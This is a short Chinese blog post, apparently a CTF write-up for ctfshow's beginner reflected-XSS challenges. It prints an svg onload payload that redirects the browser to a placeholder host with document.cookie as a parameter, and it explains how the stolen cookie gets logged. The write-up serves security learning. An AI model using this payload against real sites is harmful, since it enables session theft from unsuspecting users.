ctfshow web入门xss – mdh的小站

ctfshow web入门xss

2026-5-08 21:53

|

|

57

141 字

|

1 分钟内

本文最后更新于39 天前，其中的信息可能已经过时，如有错误请发送邮件到256704203@qq.com

做了前四题，反射型xss

均可用<svg onload=”location.href=’http(s)://xx.xx/flag.php?c=’+document.cookie”/>获取cookie

<svg>矢量图标签比如显示一个蓝色圆

onload:js事件，在svg加载完成时触发。

整个流程就是加载svg，svg加载完成触发onload，跳转到写的url，并且c作为get参数，其值为cookie的内容，被写入目标文件。

本地可以这么编辑接收文件

cookie就成功写入cookie.txt。

文末附加内容

暂无评论

发送评论编辑评论

Markdown

悄悄话

邮件提醒

|´・ω・)ノ

ヾ(≧∇≦*)ゝ

(☆ω☆)

（╯‵□′）╯︵┴─┴

￣﹃￣

(/ω＼)

∠( ᐛ 」∠)＿

(๑•̀ㅁ•́ฅ)

→_→

୧(๑•̀⌄•́๑)૭

٩(ˊᗜˋ*)و

(ノ°ο°)ノ

(´இ皿இ｀)

⌇●﹏●⌇

(ฅ´ω`ฅ)

(╯°A°)╯︵○○○

φ(￣∇￣o)

ヾ(´･･｀｡)ノ"

( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃

(ó﹏ò｡)

Σ(っ °Д °;)っ

( ,,´･ω･)ﾉ"(´っω･｀｡)

╮(╯▽╰)╭

o(*////▽////*)q

＞﹏＜

( ๑´•ω•) "(ㆆᴗㆆ)

颜文字

Emoji

小恐龙

花!